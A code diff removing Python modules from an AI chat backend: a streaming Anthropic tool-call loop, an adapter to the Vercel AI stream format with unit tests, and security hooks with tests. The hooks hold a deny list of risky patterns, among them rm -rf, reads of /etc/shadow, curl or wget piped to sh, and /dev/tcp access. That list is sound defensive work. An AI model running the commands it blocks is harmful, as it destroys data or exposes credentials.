has_started_text = False
accumulated_text = ""
accumulated_tool_calls: list[dict[str, Any]] = []
for _ in range(_MAX_TOOL_ITERATIONS):
try:
async with client.messages.stream(
model=(
config.model.split("/")[-1] if "/" in config.model else config.model
),
max_tokens=4096,
system=system_prompt,
messages=cast(Any, anthropic_messages),
tools=cast(Any, anthropic_tools) if anthropic_tools else [],
) as stream:
async for event in stream:
if event.type == "content_block_start":
block = event.content_block
if hasattr(block, "type"):
if block.type == "text" and not has_started_text:
yield StreamTextStart(id=text_block_id)
has_started_text = True
elif block.type == "tool_use":
yield StreamToolInputStart(
toolCallId=block.id, toolName=block.name
)
elif event.type == "content_block_delta":
delta = event.delta
if hasattr(delta, "type") and delta.type == "text_delta":
accumulated_text += delta.text
yield StreamTextDelta(id=text_block_id, delta=delta.text)
final_message = await stream.get_final_message()
if final_message.stop_reason == "tool_use":
if has_started_text:
yield StreamTextEnd(id=text_block_id)
has_started_text = False
text_block_id = str(uuid.uuid4())
tool_results = []
assistant_content: list[dict[str, Any]] = []
for block in final_message.content:
if block.type == "text":
assistant_content.append(
{"type": "text", "text": block.text}
)
elif block.type == "tool_use":
assistant_content.append(
{
"type": "tool_use",
"id": block.id,
"name": block.name,
"input": block.input,
}
)
# Track tool call for session persistence
accumulated_tool_calls.append(
{
"id": block.id,
"type": "function",
"function": {
"name": block.name,
"arguments": json.dumps(
block.input
if isinstance(block.input, dict)
else {}
),
},
}
)
yield StreamToolInputAvailable(
toolCallId=block.id,
toolName=block.name,
input=(
block.input if isinstance(block.input, dict) else {}
),
)
output, is_error = await _execute_tool(
block.name, block.input, tool_handlers
)
yield StreamToolOutputAvailable(
toolCallId=block.id,
toolName=block.name,
output=output,
success=not is_error,
)
# Save tool result to session
session.messages.append(
ChatMessage(
role="tool",
content=output,
tool_call_id=block.id,
)
)
tool_results.append(
{
"type": "tool_result",
"tool_use_id": block.id,
"content": output,
"is_error": is_error,
}
)
# Save assistant message with tool calls to session
session.messages.append(
ChatMessage(
role="assistant",
content=accumulated_text or None,
tool_calls=(
accumulated_tool_calls
if accumulated_tool_calls
else None
),
)
)
# Reset for next iteration
accumulated_text = ""
accumulated_tool_calls = []
anthropic_messages.append(
{"role": "assistant", "content": assistant_content}
)
anthropic_messages.append({"role": "user", "content": tool_results})
continue
else:
if has_started_text:
yield StreamTextEnd(id=text_block_id)
# Save final assistant response to session
if accumulated_text:
session.messages.append(
ChatMessage(role="assistant", content=accumulated_text)
)
yield StreamUsage(
promptTokens=final_message.usage.input_tokens,
completionTokens=final_message.usage.output_tokens,
totalTokens=final_message.usage.input_tokens
+ final_message.usage.output_tokens,
)
yield StreamFinish()
return
except Exception as e:
logger.error(f"[Anthropic Fallback] Error: {e}", exc_info=True)
yield StreamError(
errorText="An error occurred. Please try again.",
code="anthropic_error",
)
yield StreamFinish()
return
yield StreamError(errorText="Max tool iterations reached", code="max_iterations")
yield StreamFinish()
def _convert_session_to_anthropic(session: ChatSession) -> list[dict[str, Any]]:
"""Convert session messages to Anthropic format.
Handles merging consecutive same-role messages (Anthropic requires alternating roles).
"""
messages: list[dict[str, Any]] = []
for msg in session.messages:
if msg.role == "user":
new_msg = {"role": "user", "content": msg.content or ""}
elif msg.role == "assistant":
content: list[dict[str, Any]] = []
if msg.content:
content.append({"type": "text", "text": msg.content})
if msg.tool_calls:
for tc in msg.tool_calls:
func = tc.get("function", {})
args = func.get("arguments", {})
if isinstance(args, str):
try:
args = json.loads(args)
except json.JSONDecodeError:
args = {}
content.append(
{
"type": "tool_use",
"id": tc.get("id", str(uuid.uuid4())),
"name": func.get("name", ""),
"input": args,
}
)
if content:
new_msg = {"role": "assistant", "content": content}
else:
continue # Skip empty assistant messages
elif msg.role == "tool":
new_msg = {
"role": "user",
"content": [
{
"type": "tool_result",
"tool_use_id": msg.tool_call_id or "",
"content": msg.content or "",
}
],
}
else:
continue
messages.append(new_msg)
# Merge consecutive same-role messages (Anthropic requires alternating roles)
return _merge_consecutive_roles(messages)
def _merge_consecutive_roles(messages: list[dict[str, Any]]) -> list[dict[str, Any]]:
"""Merge consecutive messages with the same role.
Anthropic API requires alternating user/assistant roles.
"""
if not messages:
return []
merged: list[dict[str, Any]] = []
for msg in messages:
if merged and merged[-1]["role"] == msg["role"]:
# Merge with previous message
prev_content = merged[-1]["content"]
new_content = msg["content"]
# Normalize both to list-of-blocks form
if isinstance(prev_content, str):
prev_content = [{"type": "text", "text": prev_content}]
if isinstance(new_content, str):
new_content = [{"type": "text", "text": new_content}]
# Ensure both are lists
if not isinstance(prev_content, list):
prev_content = [prev_content]
if not isinstance(new_content, list):
new_content = [new_content]
merged[-1]["content"] = prev_content + new_content
else:
merged.append(msg)
return merged
async def _execute_tool(
tool_name: str, tool_input: Any, handlers: dict[str, Any]
) -> tuple[str, bool]:
"""Execute a tool and return (output, is_error)."""
handler = handlers.get(tool_name)
if not handler:
return f"Unknown tool: {tool_name}", True
try:
result = await handler(tool_input)
# Safely extract output - handle empty or missing content
content = result.get("content") or []
if content and isinstance(content, list) and len(content) > 0:
first_item = content[0]
output = first_item.get("text", "") if isinstance(first_item, dict) else ""
else:
output = ""
is_error = result.get("isError", False)
return output, is_error
except Exception as e:
return f"Error: {str(e)}", True

View File

@@ -1,198 +0,0 @@
"""Response adapter for converting Claude Agent SDK messages to Vercel AI SDK format.
This module provides the adapter layer that converts streaming messages from
the Claude Agent SDK into the Vercel AI SDK UI Stream Protocol format that
the frontend expects.
"""
import json
import logging
import uuid
from claude_agent_sdk import (
AssistantMessage,
Message,
ResultMessage,
SystemMessage,
TextBlock,
ToolResultBlock,
ToolUseBlock,
UserMessage,
)
from backend.api.features.chat.response_model import (
StreamBaseResponse,
StreamError,
StreamFinish,
StreamFinishStep,
StreamStart,
StreamStartStep,
StreamTextDelta,
StreamTextEnd,
StreamTextStart,
StreamToolInputAvailable,
StreamToolInputStart,
StreamToolOutputAvailable,
)
from backend.api.features.chat.sdk.tool_adapter import (
MCP_TOOL_PREFIX,
pop_pending_tool_output,
)
logger = logging.getLogger(__name__)
class SDKResponseAdapter:
"""Adapter for converting Claude Agent SDK messages to Vercel AI SDK format.
This class maintains state during a streaming session to properly track
text blocks, tool calls, and message lifecycle.
"""
def __init__(self, message_id: str | None = None):
self.message_id = message_id or str(uuid.uuid4())
self.text_block_id = str(uuid.uuid4())
self.has_started_text = False
self.has_ended_text = False
self.current_tool_calls: dict[str, dict[str, str]] = {}
self.task_id: str | None = None
self.step_open = False
def set_task_id(self, task_id: str) -> None:
"""Set the task ID for reconnection support."""
self.task_id = task_id
def convert_message(self, sdk_message: Message) -> list[StreamBaseResponse]:
"""Convert a single SDK message to Vercel AI SDK format."""
responses: list[StreamBaseResponse] = []
if isinstance(sdk_message, SystemMessage):
if sdk_message.subtype == "init":
responses.append(
StreamStart(messageId=self.message_id, taskId=self.task_id)
)
# Open the first step (matches non-SDK: StreamStart then StreamStartStep)
responses.append(StreamStartStep())
self.step_open = True
elif isinstance(sdk_message, AssistantMessage):
# After tool results, the SDK sends a new AssistantMessage for the
# next LLM turn. Open a new step if the previous one was closed.
if not self.step_open:
responses.append(StreamStartStep())
self.step_open = True
for block in sdk_message.content:
if isinstance(block, TextBlock):
if block.text:
self._ensure_text_started(responses)
responses.append(
StreamTextDelta(id=self.text_block_id, delta=block.text)
)
elif isinstance(block, ToolUseBlock):
self._end_text_if_open(responses)
# Strip MCP prefix so frontend sees "find_block"
# instead of "mcp__copilot__find_block".
tool_name = block.name.removeprefix(MCP_TOOL_PREFIX)
responses.append(
StreamToolInputStart(toolCallId=block.id, toolName=tool_name)
)
responses.append(
StreamToolInputAvailable(
toolCallId=block.id,
toolName=tool_name,
input=block.input,
)
)
self.current_tool_calls[block.id] = {"name": tool_name}
elif isinstance(sdk_message, UserMessage):
# UserMessage carries tool results back from tool execution.
content = sdk_message.content
blocks = content if isinstance(content, list) else []
for block in blocks:
if isinstance(block, ToolResultBlock) and block.tool_use_id:
tool_info = self.current_tool_calls.get(block.tool_use_id, {})
tool_name = tool_info.get("name", "unknown")
# Prefer the stashed full output over the SDK's
# (potentially truncated) ToolResultBlock content.
# The SDK truncates large results, writing them to disk,
# which breaks frontend widget parsing.
output = pop_pending_tool_output(tool_name) or (
_extract_tool_output(block.content)
)
responses.append(
StreamToolOutputAvailable(
toolCallId=block.tool_use_id,
toolName=tool_name,
output=output,
success=not (block.is_error or False),
)
)
# Close the current step after tool results — the next
# AssistantMessage will open a new step for the continuation.
if self.step_open:
responses.append(StreamFinishStep())
self.step_open = False
elif isinstance(sdk_message, ResultMessage):
self._end_text_if_open(responses)
# Close the step before finishing.
if self.step_open:
responses.append(StreamFinishStep())
self.step_open = False
if sdk_message.subtype == "success":
responses.append(StreamFinish())
elif sdk_message.subtype in ("error", "error_during_execution"):
error_msg = getattr(sdk_message, "result", None) or "Unknown error"
responses.append(
StreamError(errorText=str(error_msg), code="sdk_error")
)
responses.append(StreamFinish())
else:
logger.debug(f"Unhandled SDK message type: {type(sdk_message).__name__}")
return responses
def _ensure_text_started(self, responses: list[StreamBaseResponse]) -> None:
"""Start (or restart) a text block if needed."""
if not self.has_started_text or self.has_ended_text:
if self.has_ended_text:
self.text_block_id = str(uuid.uuid4())
self.has_ended_text = False
responses.append(StreamTextStart(id=self.text_block_id))
self.has_started_text = True
def _end_text_if_open(self, responses: list[StreamBaseResponse]) -> None:
"""End the current text block if one is open."""
if self.has_started_text and not self.has_ended_text:
responses.append(StreamTextEnd(id=self.text_block_id))
self.has_ended_text = True
def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
"""Extract a string output from a ToolResultBlock's content field."""
if isinstance(content, str):
return content
if isinstance(content, list):
parts = [item.get("text", "") for item in content if item.get("type") == "text"]
if parts:
return "".join(parts)
try:
return json.dumps(content)
except (TypeError, ValueError):
return str(content)
if content is None:
return ""
try:
return json.dumps(content)
except (TypeError, ValueError):
return str(content)

View File

@@ -1,366 +0,0 @@
"""Unit tests for the SDK response adapter."""
from claude_agent_sdk import (
AssistantMessage,
ResultMessage,
SystemMessage,
TextBlock,
ToolResultBlock,
ToolUseBlock,
UserMessage,
)
from backend.api.features.chat.response_model import (
StreamBaseResponse,
StreamError,
StreamFinish,
StreamFinishStep,
StreamStart,
StreamStartStep,
StreamTextDelta,
StreamTextEnd,
StreamTextStart,
StreamToolInputAvailable,
StreamToolInputStart,
StreamToolOutputAvailable,
)
from .response_adapter import SDKResponseAdapter
from .tool_adapter import MCP_TOOL_PREFIX
def _adapter() -> SDKResponseAdapter:
a = SDKResponseAdapter(message_id="msg-1")
a.set_task_id("task-1")
return a
# -- SystemMessage -----------------------------------------------------------
def test_system_init_emits_start_and_step():
adapter = _adapter()
results = adapter.convert_message(SystemMessage(subtype="init", data={}))
assert len(results) == 2
assert isinstance(results[0], StreamStart)
assert results[0].messageId == "msg-1"
assert results[0].taskId == "task-1"
assert isinstance(results[1], StreamStartStep)
def test_system_non_init_emits_nothing():
adapter = _adapter()
results = adapter.convert_message(SystemMessage(subtype="other", data={}))
assert results == []
# -- AssistantMessage with TextBlock -----------------------------------------
def test_text_block_emits_step_start_and_delta():
adapter = _adapter()
msg = AssistantMessage(content=[TextBlock(text="hello")], model="test")
results = adapter.convert_message(msg)
assert len(results) == 3
assert isinstance(results[0], StreamStartStep)
assert isinstance(results[1], StreamTextStart)
assert isinstance(results[2], StreamTextDelta)
assert results[2].delta == "hello"
def test_empty_text_block_emits_only_step():
adapter = _adapter()
msg = AssistantMessage(content=[TextBlock(text="")], model="test")
results = adapter.convert_message(msg)
# Empty text skipped, but step still opens
assert len(results) == 1
assert isinstance(results[0], StreamStartStep)
def test_multiple_text_deltas_reuse_block_id():
adapter = _adapter()
msg1 = AssistantMessage(content=[TextBlock(text="a")], model="test")
msg2 = AssistantMessage(content=[TextBlock(text="b")], model="test")
r1 = adapter.convert_message(msg1)
r2 = adapter.convert_message(msg2)
# First gets step+start+delta, second only delta (block & step already started)
assert len(r1) == 3
assert isinstance(r1[0], StreamStartStep)
assert isinstance(r1[1], StreamTextStart)
assert len(r2) == 1
assert isinstance(r2[0], StreamTextDelta)
assert r1[1].id == r2[0].id # same block ID
# -- AssistantMessage with ToolUseBlock --------------------------------------
def test_tool_use_emits_input_start_and_available():
"""Tool names arrive with MCP prefix and should be stripped for the frontend."""
adapter = _adapter()
msg = AssistantMessage(
content=[
ToolUseBlock(
id="tool-1",
name=f"{MCP_TOOL_PREFIX}find_agent",
input={"q": "x"},
)
],
model="test",
)
results = adapter.convert_message(msg)
assert len(results) == 3
assert isinstance(results[0], StreamStartStep)
assert isinstance(results[1], StreamToolInputStart)
assert results[1].toolCallId == "tool-1"
assert results[1].toolName == "find_agent" # prefix stripped
assert isinstance(results[2], StreamToolInputAvailable)
assert results[2].toolName == "find_agent" # prefix stripped
assert results[2].input == {"q": "x"}
def test_text_then_tool_ends_text_block():
adapter = _adapter()
text_msg = AssistantMessage(content=[TextBlock(text="thinking...")], model="test")
tool_msg = AssistantMessage(
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
model="test",
)
adapter.convert_message(text_msg) # opens step + text
results = adapter.convert_message(tool_msg)
# Step already open, so: TextEnd, ToolInputStart, ToolInputAvailable
assert len(results) == 3
assert isinstance(results[0], StreamTextEnd)
assert isinstance(results[1], StreamToolInputStart)
# -- UserMessage with ToolResultBlock ----------------------------------------
def test_tool_result_emits_output_and_finish_step():
adapter = _adapter()
# First register the tool call (opens step) — SDK sends prefixed name
tool_msg = AssistantMessage(
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}find_agent", input={})],
model="test",
)
adapter.convert_message(tool_msg)
# Now send tool result
result_msg = UserMessage(
content=[ToolResultBlock(tool_use_id="t1", content="found 3 agents")]
)
results = adapter.convert_message(result_msg)
assert len(results) == 2
assert isinstance(results[0], StreamToolOutputAvailable)
assert results[0].toolCallId == "t1"
assert results[0].toolName == "find_agent" # prefix stripped
assert results[0].output == "found 3 agents"
assert results[0].success is True
assert isinstance(results[1], StreamFinishStep)
def test_tool_result_error():
adapter = _adapter()
adapter.convert_message(
AssistantMessage(
content=[
ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}run_agent", input={})
],
model="test",
)
)
result_msg = UserMessage(
content=[ToolResultBlock(tool_use_id="t1", content="timeout", is_error=True)]
)
results = adapter.convert_message(result_msg)
assert isinstance(results[0], StreamToolOutputAvailable)
assert results[0].success is False
assert isinstance(results[1], StreamFinishStep)
def test_tool_result_list_content():
adapter = _adapter()
adapter.convert_message(
AssistantMessage(
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
model="test",
)
)
result_msg = UserMessage(
content=[
ToolResultBlock(
tool_use_id="t1",
content=[
{"type": "text", "text": "line1"},
{"type": "text", "text": "line2"},
],
)
]
)
results = adapter.convert_message(result_msg)
assert isinstance(results[0], StreamToolOutputAvailable)
assert results[0].output == "line1line2"
assert isinstance(results[1], StreamFinishStep)
def test_string_user_message_ignored():
"""A plain string UserMessage (not tool results) produces no output."""
adapter = _adapter()
results = adapter.convert_message(UserMessage(content="hello"))
assert results == []
# -- ResultMessage -----------------------------------------------------------
def test_result_success_emits_finish_step_and_finish():
adapter = _adapter()
# Start some text first (opens step)
adapter.convert_message(
AssistantMessage(content=[TextBlock(text="done")], model="test")
)
msg = ResultMessage(
subtype="success",
duration_ms=100,
duration_api_ms=50,
is_error=False,
num_turns=1,
session_id="s1",
)
results = adapter.convert_message(msg)
# TextEnd + FinishStep + StreamFinish
assert len(results) == 3
assert isinstance(results[0], StreamTextEnd)
assert isinstance(results[1], StreamFinishStep)
assert isinstance(results[2], StreamFinish)
def test_result_error_emits_error_and_finish():
adapter = _adapter()
msg = ResultMessage(
subtype="error",
duration_ms=100,
duration_api_ms=50,
is_error=True,
num_turns=0,
session_id="s1",
result="API rate limited",
)
results = adapter.convert_message(msg)
# No step was open, so no FinishStep — just Error + Finish
assert len(results) == 2
assert isinstance(results[0], StreamError)
assert "API rate limited" in results[0].errorText
assert isinstance(results[1], StreamFinish)
# -- Text after tools (new block ID) ----------------------------------------
def test_text_after_tool_gets_new_block_id():
adapter = _adapter()
# Text -> Tool -> ToolResult -> Text should get a new text block ID and step
adapter.convert_message(
AssistantMessage(content=[TextBlock(text="before")], model="test")
)
adapter.convert_message(
AssistantMessage(
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
model="test",
)
)
# Send tool result (closes step)
adapter.convert_message(
UserMessage(content=[ToolResultBlock(tool_use_id="t1", content="ok")])
)
results = adapter.convert_message(
AssistantMessage(content=[TextBlock(text="after")], model="test")
)
# Should get StreamStartStep (new step) + StreamTextStart (new block) + StreamTextDelta
assert len(results) == 3
assert isinstance(results[0], StreamStartStep)
assert isinstance(results[1], StreamTextStart)
assert isinstance(results[2], StreamTextDelta)
assert results[2].delta == "after"
# -- Full conversation flow --------------------------------------------------
def test_full_conversation_flow():
"""Simulate a complete conversation: init -> text -> tool -> result -> text -> finish."""
adapter = _adapter()
all_responses: list[StreamBaseResponse] = []
# 1. Init
all_responses.extend(
adapter.convert_message(SystemMessage(subtype="init", data={}))
)
# 2. Assistant text
all_responses.extend(
adapter.convert_message(
AssistantMessage(content=[TextBlock(text="Let me search")], model="test")
)
)
# 3. Tool use
all_responses.extend(
adapter.convert_message(
AssistantMessage(
content=[
ToolUseBlock(
id="t1",
name=f"{MCP_TOOL_PREFIX}find_agent",
input={"query": "email"},
)
],
model="test",
)
)
)
# 4. Tool result
all_responses.extend(
adapter.convert_message(
UserMessage(
content=[ToolResultBlock(tool_use_id="t1", content="Found 2 agents")]
)
)
)
# 5. More text
all_responses.extend(
adapter.convert_message(
AssistantMessage(content=[TextBlock(text="I found 2")], model="test")
)
)
# 6. Result
all_responses.extend(
adapter.convert_message(
ResultMessage(
subtype="success",
duration_ms=500,
duration_api_ms=400,
is_error=False,
num_turns=2,
session_id="s1",
)
)
)
types = [type(r).__name__ for r in all_responses]
assert types == [
"StreamStart",
"StreamStartStep", # step 1: text + tool call
"StreamTextStart",
"StreamTextDelta", # "Let me search"
"StreamTextEnd", # closed before tool
"StreamToolInputStart",
"StreamToolInputAvailable",
"StreamToolOutputAvailable", # tool result
"StreamFinishStep", # step 1 closed after tool result
"StreamStartStep", # step 2: continuation text
"StreamTextStart", # new block after tool
"StreamTextDelta", # "I found 2"
"StreamTextEnd", # closed by result
"StreamFinishStep", # step 2 closed
"StreamFinish",
]

View File

@@ -1,393 +0,0 @@
"""Security hooks for Claude Agent SDK integration.
This module provides security hooks that validate tool calls before execution,
ensuring multi-user isolation and preventing unauthorized operations.
"""
import json
import logging
import os
import re
import shlex
from typing import Any, cast
from backend.api.features.chat.sdk.tool_adapter import MCP_TOOL_PREFIX
logger = logging.getLogger(__name__)
# Tools that are blocked entirely (CLI/system access)
BLOCKED_TOOLS = {
"bash",
"shell",
"exec",
"terminal",
"command",
}
# Safe read-only commands allowed in the sandboxed Bash tool.
# These are data-processing / inspection utilities — no writes, no network.
ALLOWED_BASH_COMMANDS = {
# JSON / structured data
"jq",
# Text processing
"grep",
"egrep",
"fgrep",
"rg",
"head",
"tail",
"cat",
"wc",
"sort",
"uniq",
"cut",
"tr",
"sed",
"awk",
"column",
"fold",
"fmt",
"nl",
"paste",
"rev",
# File inspection (read-only)
"find",
"ls",
"file",
"stat",
"du",
"tree",
"basename",
"dirname",
"realpath",
# Utilities
"echo",
"printf",
"date",
"true",
"false",
"xargs",
"tee",
# Comparison / encoding
"diff",
"comm",
"base64",
"md5sum",
"sha256sum",
}
# Tools allowed only when their path argument stays within the SDK workspace.
# The SDK uses these to handle oversized tool results (writes to tool-results/
# files, then reads them back) and for workspace file operations.
WORKSPACE_SCOPED_TOOLS = {"Read", "Write", "Edit", "Glob", "Grep"}
# Tools that get sandboxed Bash validation (command allowlist + workspace paths).
SANDBOXED_BASH_TOOLS = {"Bash"}
# Dangerous patterns in tool inputs
DANGEROUS_PATTERNS = [
r"sudo",
r"rm\s+-rf",
r"dd\s+if=",
r"/etc/passwd",
r"/etc/shadow",
r"chmod\s+777",
r"curl\s+.*\|.*sh",
r"wget\s+.*\|.*sh",
r"eval\s*\(",
r"exec\s*\(",
r"__import__",
r"os\.system",
r"subprocess",
]
def _deny(reason: str) -> dict[str, Any]:
"""Return a hook denial response."""
return {
"hookSpecificOutput": {
"hookEventName": "PreToolUse",
"permissionDecision": "deny",
"permissionDecisionReason": reason,
}
}
def _validate_workspace_path(
tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None
) -> dict[str, Any]:
"""Validate that a workspace-scoped tool only accesses allowed paths.
Allowed directories:
- The SDK working directory (``/tmp/copilot-<session>/``)
- The SDK tool-results directory (``~/.claude/projects/…/tool-results/``)
"""
path = tool_input.get("file_path") or tool_input.get("path") or ""
if not path:
# Glob/Grep without a path default to cwd which is already sandboxed
return {}
resolved = os.path.normpath(os.path.expanduser(path))
# Allow access within the SDK working directory
if sdk_cwd:
norm_cwd = os.path.normpath(sdk_cwd)
if resolved.startswith(norm_cwd + os.sep) or resolved == norm_cwd:
return {}
# Allow access to ~/.claude/projects/*/tool-results/ (big tool results)
claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
if resolved.startswith(claude_dir + os.sep) and "tool-results" in resolved:
return {}
logger.warning(
f"Blocked {tool_name} outside workspace: {path} (resolved={resolved})"
)
return _deny(
f"Tool '{tool_name}' can only access files within the workspace directory."
)
def _validate_bash_command(
tool_input: dict[str, Any], sdk_cwd: str | None
) -> dict[str, Any]:
"""Validate a Bash command against the allowlist of safe commands.
Only read-only data-processing commands are allowed (jq, grep, head, etc.).
Blocks command substitution, output redirection, and disallowed executables.
Uses ``shlex.split`` to properly handle quoted strings (e.g. jq filters
containing ``|`` won't be mistaken for shell pipes).
"""
command = tool_input.get("command", "")
if not command or not isinstance(command, str):
return _deny("Bash command is empty.")
# Block command substitution — can smuggle arbitrary commands
if "$(" in command or "`" in command:
return _deny("Command substitution ($() or ``) is not allowed in Bash.")
# Block output redirection — Bash should be read-only
if re.search(r"(?<!\d)>{1,2}\s", command):
return _deny("Output redirection (> or >>) is not allowed in Bash.")
# Block /dev/ access (e.g., /dev/tcp for network)
if "/dev/" in command:
return _deny("Access to /dev/ is not allowed in Bash.")
# Tokenize with shlex (respects quotes), then extract command names.
# shlex preserves shell operators like | ; && || as separate tokens.
try:
tokens = shlex.split(command)
except ValueError:
return _deny("Malformed command (unmatched quotes).")
# Walk tokens: the first non-assignment token after a pipe/separator is a command.
expect_command = True
for token in tokens:
if token in ("|", "||", "&&", ";"):
expect_command = True
continue
if expect_command:
# Skip env var assignments (VAR=value)
if "=" in token and not token.startswith("-"):
continue
cmd_name = os.path.basename(token)
if cmd_name not in ALLOWED_BASH_COMMANDS:
allowed = ", ".join(sorted(ALLOWED_BASH_COMMANDS))
logger.warning(f"Blocked Bash command: {cmd_name}")
return _deny(
f"Command '{cmd_name}' is not allowed. "
f"Allowed commands: {allowed}"
)
expect_command = False
# Validate absolute file paths stay within workspace
if sdk_cwd:
norm_cwd = os.path.normpath(sdk_cwd)
claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
for token in tokens:
if not token.startswith("/"):
continue
resolved = os.path.normpath(token)
if resolved.startswith(norm_cwd + os.sep) or resolved == norm_cwd:
continue
if resolved.startswith(claude_dir + os.sep) and "tool-results" in resolved:
continue
logger.warning(f"Blocked Bash path outside workspace: {token}")
return _deny(
f"Bash can only access files within the workspace directory. "
f"Path '{token}' is outside the workspace."
)
return {}
def _validate_tool_access(
tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None = None
) -> dict[str, Any]:
"""Validate that a tool call is allowed.
Returns:
Empty dict to allow, or dict with hookSpecificOutput to deny
"""
# Block forbidden tools
if tool_name in BLOCKED_TOOLS:
logger.warning(f"Blocked tool access attempt: {tool_name}")
return _deny(
f"Tool '{tool_name}' is not available. "
"Use the CoPilot-specific tools instead."
)
# Sandboxed Bash: only allowlisted commands, workspace-scoped paths
if tool_name in SANDBOXED_BASH_TOOLS:
return _validate_bash_command(tool_input, sdk_cwd)
# Workspace-scoped tools: allowed only within the SDK workspace directory
if tool_name in WORKSPACE_SCOPED_TOOLS:
return _validate_workspace_path(tool_name, tool_input, sdk_cwd)
# Check for dangerous patterns in tool input
# Use json.dumps for predictable format (str() produces Python repr)
input_str = json.dumps(tool_input) if tool_input else ""
for pattern in DANGEROUS_PATTERNS:
if re.search(pattern, input_str, re.IGNORECASE):
logger.warning(
f"Blocked dangerous pattern in tool input: {pattern} in {tool_name}"
)
return _deny("Input contains blocked pattern")
return {}
def _validate_user_isolation(
tool_name: str, tool_input: dict[str, Any], user_id: str | None
) -> dict[str, Any]:
"""Validate that tool calls respect user isolation."""
# For workspace file tools, ensure path doesn't escape
if "workspace" in tool_name.lower():
path = tool_input.get("path", "") or tool_input.get("file_path", "")
if path:
# Check for path traversal
if ".." in path or path.startswith("/"):
logger.warning(
f"Blocked path traversal attempt: {path} by user {user_id}"
)
return {
"hookSpecificOutput": {
"hookEventName": "PreToolUse",
"permissionDecision": "deny",
"permissionDecisionReason": "Path traversal not allowed",
}
}
return {}
def create_security_hooks(
user_id: str | None, sdk_cwd: str | None = None
) -> dict[str, Any]:
"""Create the security hooks configuration for Claude Agent SDK.
Includes security validation and observability hooks:
- PreToolUse: Security validation before tool execution
- PostToolUse: Log successful tool executions
- PostToolUseFailure: Log and handle failed tool executions
- PreCompact: Log context compaction events (SDK handles compaction automatically)
Args:
user_id: Current user ID for isolation validation
sdk_cwd: SDK working directory for workspace-scoped tool validation
Returns:
Hooks configuration dict for ClaudeAgentOptions
"""
try:
from claude_agent_sdk import HookMatcher
from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput
async def pre_tool_use_hook(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Combined pre-tool-use validation hook."""
_ = context # unused but required by signature
tool_name = cast(str, input_data.get("tool_name", ""))
tool_input = cast(dict[str, Any], input_data.get("tool_input", {}))
# Strip MCP prefix for consistent validation
is_copilot_tool = tool_name.startswith(MCP_TOOL_PREFIX)
clean_name = tool_name.removeprefix(MCP_TOOL_PREFIX)
# Only block non-CoPilot tools; our MCP-registered tools
# (including Read for oversized results) are already sandboxed.
if not is_copilot_tool:
result = _validate_tool_access(clean_name, tool_input, sdk_cwd)
if result:
return cast(SyncHookJSONOutput, result)
# Validate user isolation
result = _validate_user_isolation(clean_name, tool_input, user_id)
if result:
return cast(SyncHookJSONOutput, result)
logger.debug(f"[SDK] Tool start: {tool_name}, user={user_id}")
return cast(SyncHookJSONOutput, {})
async def post_tool_use_hook(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Log successful tool executions for observability."""
_ = context
tool_name = cast(str, input_data.get("tool_name", ""))
logger.debug(f"[SDK] Tool success: {tool_name}, tool_use_id={tool_use_id}")
return cast(SyncHookJSONOutput, {})
async def post_tool_failure_hook(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Log failed tool executions for debugging."""
_ = context
tool_name = cast(str, input_data.get("tool_name", ""))
error = input_data.get("error", "Unknown error")
logger.warning(
f"[SDK] Tool failed: {tool_name}, error={error}, "
f"user={user_id}, tool_use_id={tool_use_id}"
)
return cast(SyncHookJSONOutput, {})
async def pre_compact_hook(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Log when SDK triggers context compaction.
The SDK automatically compacts conversation history when it grows too large.
This hook provides visibility into when compaction happens.
"""
_ = context, tool_use_id
trigger = input_data.get("trigger", "auto")
logger.info(
f"[SDK] Context compaction triggered: {trigger}, user={user_id}"
)
return cast(SyncHookJSONOutput, {})
return {
"PreToolUse": [HookMatcher(matcher="*", hooks=[pre_tool_use_hook])],
"PostToolUse": [HookMatcher(matcher="*", hooks=[post_tool_use_hook])],
"PostToolUseFailure": [
HookMatcher(matcher="*", hooks=[post_tool_failure_hook])
],
"PreCompact": [HookMatcher(matcher="*", hooks=[pre_compact_hook])],
}
except ImportError:
# Fallback for when SDK isn't available - return empty hooks
logger.warning("claude-agent-sdk not available, security hooks disabled")
return {}

View File

@@ -1,258 +0,0 @@
"""Unit tests for SDK security hooks."""
import os
from .security_hooks import _validate_tool_access, _validate_user_isolation
SDK_CWD = "/tmp/copilot-abc123"
def _is_denied(result: dict) -> bool:
hook = result.get("hookSpecificOutput", {})
return hook.get("permissionDecision") == "deny"
# -- Blocked tools -----------------------------------------------------------
def test_blocked_tools_denied():
for tool in ("bash", "shell", "exec", "terminal", "command"):
result = _validate_tool_access(tool, {})
assert _is_denied(result), f"{tool} should be blocked"
def test_unknown_tool_allowed():
result = _validate_tool_access("SomeCustomTool", {})
assert result == {}
# -- Workspace-scoped tools --------------------------------------------------
def test_read_within_workspace_allowed():
result = _validate_tool_access(
"Read", {"file_path": f"{SDK_CWD}/file.txt"}, sdk_cwd=SDK_CWD
)
assert result == {}
def test_write_within_workspace_allowed():
result = _validate_tool_access(
"Write", {"file_path": f"{SDK_CWD}/output.json"}, sdk_cwd=SDK_CWD
)
assert result == {}
def test_edit_within_workspace_allowed():
result = _validate_tool_access(
"Edit", {"file_path": f"{SDK_CWD}/src/main.py"}, sdk_cwd=SDK_CWD
)
assert result == {}
def test_glob_within_workspace_allowed():
result = _validate_tool_access("Glob", {"path": f"{SDK_CWD}/src"}, sdk_cwd=SDK_CWD)
assert result == {}
def test_grep_within_workspace_allowed():
result = _validate_tool_access("Grep", {"path": f"{SDK_CWD}/src"}, sdk_cwd=SDK_CWD)
assert result == {}
